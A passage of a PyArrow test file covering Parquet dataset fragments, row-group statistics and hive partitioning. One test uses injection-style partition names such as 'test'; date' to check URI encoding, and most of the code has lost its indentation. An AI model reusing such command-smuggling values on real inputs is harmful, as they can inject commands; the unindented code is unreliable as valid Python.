dictionary_arrays = [
arrays[0].dictionary_encode(),
arrays[1],
arrays[2].dictionary_encode()
]
dictionary_format = ds.ParquetFileFormat(
read_options=ds.ParquetReadOptions(
dictionary_columns=['alpha', 'animal']
),
use_buffered_stream=True,
buffer_size=4096,
)
cases = [
(arrays, ds.ParquetFileFormat()),
(dictionary_arrays, dictionary_format)
]
for arrays, format_ in cases:
table = pa.table(arrays, names=['alpha', 'num', 'animal'])
out = pa.BufferOutputStream()
pq.write_table(table, out)
buffer = out.getvalue()
fragment = format_.make_fragment(buffer)
assert dataset_reader.to_table(fragment).equals(table)
pickled = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(pickled).equals(table)
@pytest.mark.parquet
def _create_dataset_for_fragments(tempdir, chunk_size=None, filesystem=None):
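    # Helper: write an 8-row table partitioned on 'part' ('a'/'b') via
    # pq.write_to_dataset (chunk_size controls the parquet row group size)
    # and return both the original table and the re-discovered
    # hive-partitioned dataset.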
table = pa.table(
[range(8), [1] * 8, ['a'] * 4 + ['b'] * 4],
names=['f1', 'f2', 'part']
)
path = str(tempdir / "test_parquet_dataset")
# write_to_dataset currently requires pandas
pq.write_to_dataset(table, path,
partition_cols=["part"], chunk_size=chunk_size)
dataset = ds.dataset(
path, format="parquet", partitioning="hive", filesystem=filesystem
)
return table, dataset
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir)
# list fragments
fragments = list(dataset.get_fragments())
assert len(fragments) == 2
f = fragments[0]
physical_names = ['f1', 'f2']
# file's schema does not include partition column
assert f.physical_schema.names == physical_names
assert f.format.inspect(f.path, f.filesystem) == f.physical_schema
assert f.partition_expression.equals(ds.field('part') == 'a')
# By default, the partition column is not part of the schema.
result = dataset_reader.to_table(f)
assert result.column_names == physical_names
assert result.equals(table.remove_column(2).slice(0, 4))
# scanning fragment includes partition columns when given the proper
# schema.
result = dataset_reader.to_table(f, schema=dataset.schema)
assert result.column_names == ['f1', 'f2', 'part']
assert result.equals(table.slice(0, 4))
assert f.physical_schema == result.schema.remove(2)
# scanning fragments follow filter predicate
result = dataset_reader.to_table(
f, schema=dataset.schema, filter=ds.field('f1') < 2)
assert result.column_names == ['f1', 'f2', 'part']
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_implicit_cast(tempdir):
# ARROW-8693
table = pa.table([range(8), [1] * 4 + [2] * 4], names=['col', 'part'])
path = str(tempdir / "test_parquet_dataset")
pq.write_to_dataset(table, path, partition_cols=["part"])
part = ds.partitioning(pa.schema([('part', 'int8')]), flavor="hive")
dataset = ds.dataset(path, format="parquet", partitioning=part)
fragments = dataset.get_fragments(filter=ds.field("part") >= 2)
assert len(list(fragments)) == 1
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_reconstruct(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir)
def assert_yields_projected(fragment, row_slice,
columns=None, filter=None):
actual = fragment.to_table(
schema=table.schema, columns=columns, filter=filter)
column_names = columns if columns else table.column_names
assert actual.column_names == column_names
expected = table.slice(*row_slice).select(column_names)
assert actual.equals(expected)
fragment = list(dataset.get_fragments())[0]
parquet_format = fragment.format
# test pickle roundtrip
pickled_fragment = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(
pickled_fragment) == dataset_reader.to_table(fragment)
# manually re-construct a fragment, with explicit schema
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert dataset_reader.to_table(new_fragment).equals(
dataset_reader.to_table(fragment))
assert_yields_projected(new_fragment, (0, 4))
# filter / column projection, inspected schema
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert_yields_projected(new_fragment, (0, 2), filter=ds.field('f1') < 2)
# filter requiring cast / column projection, inspected schema
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert_yields_projected(new_fragment, (0, 2),
columns=['f1'], filter=ds.field('f1') < 2.0)
# filter on the partition column
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
assert_yields_projected(new_fragment, (0, 4),
filter=ds.field('part') == 'a')
    # Fragments don't expose the partition columns unless a schema containing
    # them is passed to `to_table(schema=...)`.
pattern = (r'No match for FieldRef.Name\(part\) in ' +
fragment.physical_schema.to_string(False, False, False))
with pytest.raises(ValueError, match=pattern):
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression)
dataset_reader.to_table(new_fragment, filter=ds.field('part') == 'a')
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_row_groups(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=2)
fragment = list(dataset.get_fragments())[0]
# list and scan row group fragments
row_group_fragments = list(fragment.split_by_row_group())
assert len(row_group_fragments) == fragment.num_row_groups == 2
result = dataset_reader.to_table(
row_group_fragments[0], schema=dataset.schema)
assert result.column_names == ['f1', 'f2', 'part']
assert len(result) == 2
assert result.equals(table.slice(0, 2))
assert row_group_fragments[0].row_groups is not None
assert row_group_fragments[0].num_row_groups == 1
assert row_group_fragments[0].row_groups[0].statistics == {
'f1': {'min': 0, 'max': 1},
'f2': {'min': 1, 'max': 1},
}
fragment = list(dataset.get_fragments(filter=ds.field('f1') < 1))[0]
row_group_fragments = list(fragment.split_by_row_group(ds.field('f1') < 1))
assert len(row_group_fragments) == 1
result = dataset_reader.to_table(
row_group_fragments[0], filter=ds.field('f1') < 1)
assert len(result) == 1
@pytest.mark.parquet
def test_fragments_parquet_num_row_groups(tempdir):
table = pa.table({'a': range(8)})
pq.write_table(table, tempdir / "test.parquet", row_group_size=2)
dataset = ds.dataset(tempdir / "test.parquet", format="parquet")
original_fragment = list(dataset.get_fragments())[0]
# create fragment with subset of row groups
fragment = original_fragment.format.make_fragment(
original_fragment.path, original_fragment.filesystem,
row_groups=[1, 3])
assert fragment.num_row_groups == 2
# ensure that parsing metadata preserves correct number of row groups
fragment.ensure_complete_metadata()
assert fragment.num_row_groups == 2
assert len(fragment.row_groups) == 2
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_parquet_row_groups_dictionary(tempdir, dataset_reader):
import pandas as pd
df = pd.DataFrame(dict(col1=['a', 'b'], col2=[1, 2]))
df['col1'] = df['col1'].astype("category")
pq.write_table(pa.table(df), tempdir / "test_filter_dictionary.parquet")
import pyarrow.dataset as ds
dataset = ds.dataset(tempdir / 'test_filter_dictionary.parquet')
result = dataset_reader.to_table(dataset, filter=ds.field("col1") == "a")
assert (df.iloc[0] == result.to_pandas()).all().all()
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_ensure_metadata(tempdir, open_logging_fs):
fs, assert_opens = open_logging_fs
_, dataset = _create_dataset_for_fragments(
tempdir, chunk_size=2, filesystem=fs
)
fragment = list(dataset.get_fragments())[0]
# with default discovery, no metadata loaded
with assert_opens([fragment.path]):
fragment.ensure_complete_metadata()
assert fragment.row_groups == [0, 1]
# second time -> use cached / no file IO
with assert_opens([]):
fragment.ensure_complete_metadata()
# recreate fragment with row group ids
new_fragment = fragment.format.make_fragment(
fragment.path, fragment.filesystem, row_groups=[0, 1]
)
assert new_fragment.row_groups == fragment.row_groups
# collect metadata
new_fragment.ensure_complete_metadata()
row_group = new_fragment.row_groups[0]
assert row_group.id == 0
assert row_group.num_rows == 2
assert row_group.statistics is not None
# pickling preserves row group ids
pickled_fragment = pickle.loads(pickle.dumps(new_fragment))
with assert_opens([fragment.path]):
assert pickled_fragment.row_groups == [0, 1]
row_group = pickled_fragment.row_groups[0]
assert row_group.id == 0
assert row_group.statistics is not None
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_parquet_pickle_no_metadata(tempdir, open_logging_fs):
# https://issues.apache.org/jira/browse/ARROW-15796
fs, assert_opens = open_logging_fs
_, dataset = _create_dataset_for_fragments(tempdir, filesystem=fs)
fragment = list(dataset.get_fragments())[1]
# second fragment hasn't yet loaded the metadata,
# and pickling it also should not read the metadata
with assert_opens([]):
pickled_fragment = pickle.loads(pickle.dumps(fragment))
# then accessing the row group info reads the metadata
with assert_opens([pickled_fragment.path]):
row_groups = pickled_fragment.row_groups
assert row_groups == [0]
def _create_dataset_all_types(tempdir, chunk_size=None):
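    # Helper: write a small parquet dataset whose single table covers most
    # primitive types, used for checking per-column row group statistics.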
table = pa.table(
[
pa.array([True, None, False], pa.bool_()),
pa.array([1, 10, 42], pa.int8()),
pa.array([1, 10, 42], pa.uint8()),
pa.array([1, 10, 42], pa.int16()),
pa.array([1, 10, 42], pa.uint16()),
pa.array([1, 10, 42], pa.int32()),
pa.array([1, 10, 42], pa.uint32()),
pa.array([1, 10, 42], pa.int64()),
pa.array([1, 10, 42], pa.uint64()),
pa.array([1.0, 10.0, 42.0], pa.float32()),
pa.array([1.0, 10.0, 42.0], pa.float64()),
pa.array(['a', None, 'z'], pa.utf8()),
pa.array(['a', None, 'z'], pa.binary()),
pa.array([1, 10, 42], pa.timestamp('s')),
pa.array([1, 10, 42], pa.timestamp('ms')),
pa.array([1, 10, 42], pa.timestamp('us')),
pa.array([1, 10, 42], pa.date32()),
pa.array([1, 10, 4200000000], pa.date64()),
pa.array([1, 10, 42], pa.time32('s')),
pa.array([1, 10, 42], pa.time64('us')),
],
names=[
'boolean',
'int8',
'uint8',
'int16',
'uint16',
'int32',
'uint32',
'int64',
'uint64',
'float',
'double',
'utf8',
'binary',
'ts[s]',
'ts[ms]',
'ts[us]',
'date32',
'date64',
'time32',
'time64',
]
)
path = str(tempdir / "test_parquet_dataset_all_types")
# write_to_dataset currently requires pandas
pq.write_to_dataset(table, path, use_legacy_dataset=True,
chunk_size=chunk_size)
return table, ds.dataset(path, format="parquet", partitioning="hive")
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_parquet_fragment_statistics(tempdir):
table, dataset = _create_dataset_all_types(tempdir)
fragment = list(dataset.get_fragments())[0]
import datetime
def dt_s(x): return datetime.datetime(1970, 1, 1, 0, 0, x)
def dt_ms(x): return datetime.datetime(1970, 1, 1, 0, 0, 0, x*1000)
def dt_us(x): return datetime.datetime(1970, 1, 1, 0, 0, 0, x)
date = datetime.date
time = datetime.time
# list and scan row group fragments
row_group_fragments = list(fragment.split_by_row_group())
assert row_group_fragments[0].row_groups is not None
row_group = row_group_fragments[0].row_groups[0]
assert row_group.num_rows == 3
assert row_group.total_byte_size > 1000
assert row_group.statistics == {
'boolean': {'min': False, 'max': True},
'int8': {'min': 1, 'max': 42},
'uint8': {'min': 1, 'max': 42},
'int16': {'min': 1, 'max': 42},
'uint16': {'min': 1, 'max': 42},
'int32': {'min': 1, 'max': 42},
'uint32': {'min': 1, 'max': 42},
'int64': {'min': 1, 'max': 42},
'uint64': {'min': 1, 'max': 42},
'float': {'min': 1.0, 'max': 42.0},
'double': {'min': 1.0, 'max': 42.0},
'utf8': {'min': 'a', 'max': 'z'},
'binary': {'min': b'a', 'max': b'z'},
'ts[s]': {'min': dt_s(1), 'max': dt_s(42)},
'ts[ms]': {'min': dt_ms(1), 'max': dt_ms(42)},
'ts[us]': {'min': dt_us(1), 'max': dt_us(42)},
'date32': {'min': date(1970, 1, 2), 'max': date(1970, 2, 12)},
'date64': {'min': date(1970, 1, 1), 'max': date(1970, 2, 18)},
'time32': {'min': time(0, 0, 1), 'max': time(0, 0, 42)},
'time64': {'min': time(0, 0, 0, 1), 'max': time(0, 0, 0, 42)},
}
@pytest.mark.parquet
def test_parquet_fragment_statistics_nulls(tempdir):
table = pa.table({'a': [0, 1, None, None], 'b': ['a', 'b', None, None]})
pq.write_table(table, tempdir / "test.parquet", row_group_size=2)
dataset = ds.dataset(tempdir / "test.parquet", format="parquet")
fragments = list(dataset.get_fragments())[0].split_by_row_group()
# second row group has all nulls -> no statistics
assert fragments[1].row_groups[0].statistics == {}
@pytest.mark.pandas
@pytest.mark.parquet
def test_parquet_empty_row_group_statistics(tempdir):
df = pd.DataFrame({"a": ["a", "b", "b"], "b": [4, 5, 6]})[:0]
df.to_parquet(tempdir / "test.parquet", engine="pyarrow")
dataset = ds.dataset(tempdir / "test.parquet", format="parquet")
fragments = list(dataset.get_fragments())[0].split_by_row_group()
# Only row group is empty
assert fragments[0].row_groups[0].statistics == {}
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_row_groups_predicate(tempdir):
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=2)
fragment = list(dataset.get_fragments())[0]
assert fragment.partition_expression.equals(ds.field('part') == 'a')
# predicate may reference a partition field not present in the
# physical_schema if an explicit schema is provided to split_by_row_group
# filter matches partition_expression: all row groups
row_group_fragments = list(
fragment.split_by_row_group(filter=ds.field('part') == 'a',
schema=dataset.schema))
assert len(row_group_fragments) == 2
# filter contradicts partition_expression: no row groups
row_group_fragments = list(
fragment.split_by_row_group(filter=ds.field('part') == 'b',
schema=dataset.schema))
assert len(row_group_fragments) == 0
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_row_groups_reconstruct(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=2)
fragment = list(dataset.get_fragments())[0]
parquet_format = fragment.format
row_group_fragments = list(fragment.split_by_row_group())
# test pickle roundtrip
pickled_fragment = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(
pickled_fragment) == dataset_reader.to_table(fragment)
# manually re-construct row group fragments
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression,
row_groups=[0])
result = dataset_reader.to_table(new_fragment)
assert result.equals(dataset_reader.to_table(row_group_fragments[0]))
# manually re-construct a row group fragment with filter/column projection
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression,
row_groups={1})
result = dataset_reader.to_table(
new_fragment, schema=table.schema, columns=['f1', 'part'],
filter=ds.field('f1') < 3, )
assert result.column_names == ['f1', 'part']
assert len(result) == 1
# out of bounds row group index
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression,
row_groups={2})
with pytest.raises(IndexError, match="references row group 2"):
dataset_reader.to_table(new_fragment)
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_subset_ids(tempdir, open_logging_fs,
dataset_reader):
fs, assert_opens = open_logging_fs
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=1,
filesystem=fs)
fragment = list(dataset.get_fragments())[0]
# select with row group ids
subfrag = fragment.subset(row_group_ids=[0, 3])
with assert_opens([]):
assert subfrag.num_row_groups == 2
assert subfrag.row_groups == [0, 3]
assert subfrag.row_groups[0].statistics is not None
# check correct scan result of subset
result = dataset_reader.to_table(subfrag)
assert result.to_pydict() == {"f1": [0, 3], "f2": [1, 1]}
# empty list of ids
subfrag = fragment.subset(row_group_ids=[])
assert subfrag.num_row_groups == 0
assert subfrag.row_groups == []
result = dataset_reader.to_table(subfrag, schema=dataset.schema)
assert result.num_rows == 0
assert result.equals(table[:0])
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_subset_filter(tempdir, open_logging_fs,
dataset_reader):
fs, assert_opens = open_logging_fs
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=1,
filesystem=fs)
fragment = list(dataset.get_fragments())[0]
# select with filter
subfrag = fragment.subset(ds.field("f1") >= 1)
with assert_opens([]):
assert subfrag.num_row_groups == 3
assert len(subfrag.row_groups) == 3
assert subfrag.row_groups[0].statistics is not None
# check correct scan result of subset
result = dataset_reader.to_table(subfrag)
assert result.to_pydict() == {"f1": [1, 2, 3], "f2": [1, 1, 1]}
# filter that results in empty selection
subfrag = fragment.subset(ds.field("f1") > 5)
assert subfrag.num_row_groups == 0
assert subfrag.row_groups == []
result = dataset_reader.to_table(subfrag, schema=dataset.schema)
assert result.num_rows == 0
assert result.equals(table[:0])
# passing schema to ensure filter on partition expression works
subfrag = fragment.subset(ds.field("part") == "a", schema=dataset.schema)
assert subfrag.num_row_groups == 4
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_subset_invalid(tempdir):
_, dataset = _create_dataset_for_fragments(tempdir, chunk_size=1)
fragment = list(dataset.get_fragments())[0]
# passing none or both of filter / row_group_ids
with pytest.raises(ValueError):
fragment.subset(ds.field("f1") >= 1, row_group_ids=[1, 2])
with pytest.raises(ValueError):
fragment.subset()
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_repr(tempdir, dataset):
# partitioned parquet dataset
fragment = list(dataset.get_fragments())[0]
assert (
repr(fragment) ==
"<pyarrow.dataset.ParquetFileFragment path=subdir/1/xxx/file0.parquet "
"partition=[key=xxx, group=1]>"
)
# single-file parquet dataset (no partition information in repr)
table, path = _create_single_file(tempdir)
dataset = ds.dataset(path, format="parquet")
fragment = list(dataset.get_fragments())[0]
assert (
repr(fragment) ==
"<pyarrow.dataset.ParquetFileFragment path={}>".format(
dataset.filesystem.normalize_path(str(path)))
)
# non-parquet format
path = tempdir / "data.feather"
pa.feather.write_feather(table, path)
dataset = ds.dataset(path, format="feather")
fragment = list(dataset.get_fragments())[0]
assert (
repr(fragment) ==
"<pyarrow.dataset.FileFragment type=ipc path={}>".format(
dataset.filesystem.normalize_path(str(path)))
)
@pytest.mark.parquet
def test_partitioning_factory(mockfs):
paths_or_selector = fs.FileSelector('subdir', recursive=True)
format = ds.ParquetFileFormat()
options = ds.FileSystemFactoryOptions('subdir')
partitioning_factory = ds.DirectoryPartitioning.discover(['group', 'key'])
assert isinstance(partitioning_factory, ds.PartitioningFactory)
options.partitioning_factory = partitioning_factory
factory = ds.FileSystemDatasetFactory(
mockfs, paths_or_selector, format, options
)
inspected_schema = factory.inspect()
# i64/f64 from data, group/key from "/1/xxx" and "/2/yyy" paths
expected_schema = pa.schema([
("i64", pa.int64()),
("f64", pa.float64()),
("str", pa.string()),
("const", pa.int64()),
("struct", pa.struct({'a': pa.int64(), 'b': pa.string()})),
("group", pa.int32()),
("key", pa.string()),
])
assert inspected_schema.equals(expected_schema)
hive_partitioning_factory = ds.HivePartitioning.discover()
assert isinstance(hive_partitioning_factory, ds.PartitioningFactory)
@pytest.mark.parquet
@pytest.mark.parametrize('infer_dictionary', [False, True])
def test_partitioning_factory_dictionary(mockfs, infer_dictionary):
paths_or_selector = fs.FileSelector('subdir', recursive=True)
format = ds.ParquetFileFormat()
options = ds.FileSystemFactoryOptions('subdir')
options.partitioning_factory = ds.DirectoryPartitioning.discover(
['group', 'key'], infer_dictionary=infer_dictionary)
factory = ds.FileSystemDatasetFactory(
mockfs, paths_or_selector, format, options)
inferred_schema = factory.inspect()
if infer_dictionary:
expected_type = pa.dictionary(pa.int32(), pa.string())
assert inferred_schema.field('key').type == expected_type
table = factory.finish().to_table().combine_chunks()
actual = table.column('key').chunk(0)
expected = pa.array(['xxx'] * 5 + ['yyy'] * 5).dictionary_encode()
assert actual.equals(expected)
# ARROW-9345 ensure filtering on the partition field works
table = factory.finish().to_table(filter=ds.field('key') == 'xxx')
actual = table.column('key').chunk(0)
expected = expected.slice(0, 5)
assert actual.equals(expected)
else:
assert inferred_schema.field('key').type == pa.string()
def test_partitioning_factory_segment_encoding():
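    # Partition segments are percent-encoded on disk; the default 'uri'
    # decoding should recover the original values, while 'none' keeps the
    # raw encoded strings.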
mockfs = fs._MockFileSystem()
format = ds.IpcFileFormat()
schema = pa.schema([("i64", pa.int64())])
table = pa.table([pa.array(range(10))], schema=schema)
partition_schema = pa.schema(
[("date", pa.timestamp("s")), ("string", pa.string())])
string_partition_schema = pa.schema(
[("date", pa.string()), ("string", pa.string())])
full_schema = pa.schema(list(schema) + list(partition_schema))
for directory in [
"directory/2021-05-04 00%3A00%3A00/%24",
"hive/date=2021-05-04 00%3A00%3A00/string=%24",
]:
mockfs.create_dir(directory)
with mockfs.open_output_stream(directory + "/0.feather") as sink:
with pa.ipc.new_file(sink, schema) as writer:
writer.write_table(table)
writer.close()
# Directory
selector = fs.FileSelector("directory", recursive=True)
options = ds.FileSystemFactoryOptions("directory")
options.partitioning_factory = ds.DirectoryPartitioning.discover(
schema=partition_schema)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
inferred_schema = factory.inspect()
assert inferred_schema == full_schema
actual = factory.finish().to_table(columns={
"date_int": ds.field("date").cast(pa.int64()),
})
assert actual[0][0].as_py() == 1620086400
options.partitioning_factory = ds.DirectoryPartitioning.discover(
["date", "string"], segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning = ds.DirectoryPartitioning(
string_partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning_factory = ds.DirectoryPartitioning.discover(
schema=partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
with pytest.raises(pa.ArrowInvalid,
match="Could not cast segments for partition field"):
inferred_schema = factory.inspect()
# Hive
selector = fs.FileSelector("hive", recursive=True)
options = ds.FileSystemFactoryOptions("hive")
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
inferred_schema = factory.inspect()
assert inferred_schema == full_schema
actual = factory.finish().to_table(columns={
"date_int": ds.field("date").cast(pa.int64()),
})
assert actual[0][0].as_py() == 1620086400
options.partitioning_factory = ds.HivePartitioning.discover(
segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning = ds.HivePartitioning(
string_partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
with pytest.raises(pa.ArrowInvalid,
match="Could not cast segments for partition field"):
inferred_schema = factory.inspect()
def test_partitioning_factory_hive_segment_encoding_key_encoded():
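    # Here the Hive keys themselves are percent-encoded as well; 'uri'
    # decoding recovers both keys and values, while 'none' preserves the raw
    # encoded field names and values.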
mockfs = fs._MockFileSystem()
format = ds.IpcFileFormat()
schema = pa.schema([("i64", pa.int64())])
table = pa.table([pa.array(range(10))], schema=schema)
partition_schema = pa.schema(
[("test'; date", pa.timestamp("s")), ("test';[ string'", pa.string())])
string_partition_schema = pa.schema(
[("test'; date", pa.string()), ("test';[ string'", pa.string())])
full_schema = pa.schema(list(schema) + list(partition_schema))
partition_schema_en = pa.schema(
[("test%27%3B%20date", pa.timestamp("s")),
("test%27%3B%5B%20string%27", pa.string())])
string_partition_schema_en = pa.schema(
[("test%27%3B%20date", pa.string()),
("test%27%3B%5B%20string%27", pa.string())])
directory = ("hive/test%27%3B%20date=2021-05-04 00%3A00%3A00/"
"test%27%3B%5B%20string%27=%24")
mockfs.create_dir(directory)
with mockfs.open_output_stream(directory + "/0.feather") as sink:
with pa.ipc.new_file(sink, schema) as writer:
writer.write_table(table)
writer.close()
# Hive
selector = fs.FileSelector("hive", recursive=True)
options = ds.FileSystemFactoryOptions("hive")
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
inferred_schema = factory.inspect()
assert inferred_schema == full_schema
actual = factory.finish().to_table(columns={
"date_int": ds.field("test'; date").cast(pa.int64()),
})
assert actual[0][0].as_py() == 1620086400
options.partitioning_factory = ds.HivePartitioning.discover(
segment_encoding="uri")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test'; date") == "2021-05-04 00:00:00") &
(ds.field("test';[ string'") == "$"))
options.partitioning = ds.HivePartitioning(
string_partition_schema, segment_encoding="uri")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test'; date") == "2021-05-04 00:00:00") &
(ds.field("test';[ string'") == "$"))
options.partitioning_factory = ds.HivePartitioning.discover(
segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test%27%3B%20date") == "2021-05-04 00%3A00%3A00") &
(ds.field("test%27%3B%5B%20string%27") == "%24"))
options.partitioning = ds.HivePartitioning(
string_partition_schema_en, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test%27%3B%20date") == "2021-05-04 00%3A00%3A00") &
(ds.field("test%27%3B%5B%20string%27") == "%24"))
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema_en, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
with pytest.raises(pa.ArrowInvalid,
match="Could not cast segments for partition field"):
inferred_schema = factory.inspect()
def test_dictionary_partitioning_outer_nulls_raises(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
part = ds.partitioning(
pa.schema([pa.field('a', pa.string()), pa.field('b', pa.string())]))
with pytest.raises(pa.ArrowInvalid):
ds.write_dataset(table, tempdir, format='ipc', partitioning=part)
def test_positional_keywords_raises(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
with pytest.raises(TypeError):
ds.write_dataset(table, tempdir, "basename-{i}.arrow")
@pytest.mark.parquet
@pytest.mark.pandas
def test_read_partition_keys_only(tempdir):
BATCH_SIZE = 2 ** 15
    # Regression test for ARROW-15318: reading only the partition keys from
    # files whose batches are larger than the default batch size (so the
    # column has to come back as two chunks)
table = pa.table({
'key': pa.repeat(0, BATCH_SIZE + 1),
'value': np.arange(BATCH_SIZE + 1)})
pq.write_to_dataset(
table[:BATCH_SIZE],
tempdir / 'one', partition_cols=['key'])
pq.write_to_dataset(
table[:BATCH_SIZE + 1],
tempdir / 'two', partition_cols=['key'])
table = pq.read_table(tempdir / 'one', columns=['key'])
assert table['key'].num_chunks == 1
table = pq.read_table(tempdir / 'two', columns=['key', 'value'])
assert table['key'].num_chunks == 2
table = pq.read_table(tempdir / 'two', columns=['key'])
assert table['key'].num_chunks == 2
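# Helpers for checking the directory layout produced by partitioned writes:
# _list_all_dirs collects the leaf directories under a base directory as
# posix-style relative paths.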
def _has_subdirs(basedir):
elements = os.listdir(basedir)
return any([os.path.isdir(os.path.join(basedir, el)) for el in elements])
def _do_list_all_dirs(basedir, path_so_far, result):
for f in os.listdir(basedir):
true_nested = os.path.join(basedir, f)
if os.path.isdir(true_nested):
norm_nested = posixpath.join(path_so_far, f)
if _has_subdirs(true_nested):
_do_list_all_dirs(true_nested, norm_nested, result)
else:
result.append(norm_nested)
def _list_all_dirs(basedir):
result = []
_do_list_all_dirs(basedir, '', result)
return result
def _check_dataset_directories(tempdir, expected_directories):
actual_directories = set(_list_all_dirs(tempdir))
assert actual_directories == set(expected_directories)
def test_dictionary_partitioning_inner_nulls(tempdir):
table = pa.table({'a': ['x', 'y', 'z'], 'b': ['x', 'y', None]})
part = ds.partitioning(
pa.schema([pa.field('a', pa.string()), pa.field('b', pa.string())]))
ds.write_dataset(table, tempdir, format='ipc', partitioning=part)
_check_dataset_directories(tempdir, ['x/x', 'y/y', 'z'])
def test_hive_partitioning_nulls(tempdir):
table = pa.table({'a': ['x', None, 'z'], 'b': ['x', 'y', None]})
part = ds.HivePartitioning(pa.schema(
[pa.field('a', pa.string()), pa.field('b', pa.string())]), None, 'xyz')
ds.write_dataset(table, tempdir, format='ipc', partitioning=part)
_check_dataset_directories(tempdir, ['a=x/b=x', 'a=xyz/b=y', 'a=z/b=xyz'])
def test_partitioning_function():
schema = pa.schema([("year", pa.int16()), ("month", pa.int8())])
names = ["year", "month"]
# default DirectoryPartitioning
part = ds.partitioning(schema)
assert isinstance(part, ds.DirectoryPartitioning)
part = ds.partitioning(schema, dictionaries="infer")
assert isinstance(part, ds.PartitioningFactory)
part = ds.partitioning(field_names=names)
assert isinstance(part, ds.PartitioningFactory)
# needs schema or list of names
